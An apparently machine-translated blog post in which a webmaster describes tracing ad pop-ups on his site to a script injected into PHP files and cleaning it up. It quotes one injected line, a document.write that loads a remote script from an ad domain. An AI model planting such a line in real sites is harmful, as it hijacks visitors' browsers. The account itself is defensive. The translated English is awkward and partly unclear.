Using the Chromium core browser's grab tool to clear malicious code

Intermediary transaction SEO diagnosis Taobao guest Cloud host technology Hall

Last year about December there was a friend reminded me to open the site after the ad pop-up. Because before the site has a home page file was inserted into the malicious code, so I deliberately open the site carefully look at the source code is suspicious, but no fruit. I ask a friend is not every time pop up, friends say not every time, is occasionally there will be, and then I concluded that the telecommunications operators do the DNS hijacking ads. Soon after the team in Beijing Peng Peng asked me why I open the home page sometimes there will be game ads bounce out, this time I am sure the site must be put a malicious code. Again carefully look at the source of the Web page, this time finally found clues, malicious code does exist, but not the home page file, but placed in the two-level domain name forum in a data call for the PHP file "api.php", the malicious code author wrote:

document.write ("<script src=http://ad.nu99.com/ip.asp?loc=zibo></script>");

Then this file was called to the main station and then loaded the code, and the back of the Zibo is why I have never found in the Zibo advertising page pop-up reasons.

May to attend the entrepreneur conference in Beijing, in the hotel room to browse the Web site found that there are ads page pop-up, hurriedly open the source code to see that there is no anomaly, at that time to look for a careful look at the problem, but the participants back to forget this thing.

Last week to play with a friend, show him my website, suddenly found pop-up ads, this time I am sure that the site has been inserted in the malicious code, must look for reasons, this week too busy and almost forget this thing, today's Web site access speed is particularly slow, the morning often open the phenomenon, for security reasons, Made a temporary data backup. After the completion of the data backup to the computer room customer service QQ message said the site speed open slow, but did not get a reply. The afternoon of the site to open a little bit better but still slow, open the home page also need to load the process, in this loading the first few seconds I noticed in the browser status bar of a domain name ad.df77.com, this domain name looks too familiar, with the previous treatment of ad.nu99.com the same. This time, can not put this malicious code to run, must be uncovered.

process, so the script code segment one by one to troubleshoot, and eventually failed to find. Finally thought of the Chromium core browser grab tool, open the Grab tool, refresh the page, in the following list of source packages clearly listed in the pages loaded with the source data of each domain:

Look in the Sources tab, download the ' Ip.asp?shandong| from the ad.df77.com domain Zibo ' Once again proved the existence of malicious code, open the receptacle tag, here is all the real-time download of the network data, carefully looking down, and finally saw here the malicious code hiding files, that is, hidden in the task.js.php file:

Find the task.js.php file in FTP, view the last modified time is December 24, 2012, this proves that malicious code has been inserted for a full six months, hurriedly download the file to the local, save the sample, upload a good task.js.php file coverage.

Here also records and please webmaster Brothers to pay attention to the following information, please strengthen the prevention:

There are nearly hundreds of requests for help from this domain name attack on the web.

The hacker is bound to have multiple domain names on this IP, which is suspected to be used for malicious attacks.

After processing finished mood is not calm, this let me once again taste to as a grassroots webmaster in Entrepreneurial road hardships. As a webmaster must write code to kill Trojan, both to repair pictures and edit text, both to do the promotion and sales, to invest money to purchase domain name server, when you devote all the energy like care baby as caring for the site slowly grow up also to prevent all kinds of black hands to steal the fruits of labor.

As the old saying goes, "surgery has a specialization", yes, I'm not a hacker who doesn't know how to attack others. Perhaps as "villains, Outsmart" said, in my personal strength can never withstand hacker attacks. But I'm on the road and I can't stay.

As a small dream for the heart and do not know how tired in the road ahead of the small webmaster, although not satisfied with the status quo I also often because of a little achievement and complacent, but has not forgotten Joe's teachings on our "Stay Hungry,stay follish", Quote the Moon Blog The unique understanding of this sentence as the end bar:

"Although we may never be able to create anything new or perfect, we can be more stubborn and clumsy to do what we love-to be foolish and maverick, even if the world is still sophisticated, without interfering with our efforts and efforts." ”

This article starts Li Jiechun's blog http://blog.qlzhan.com/361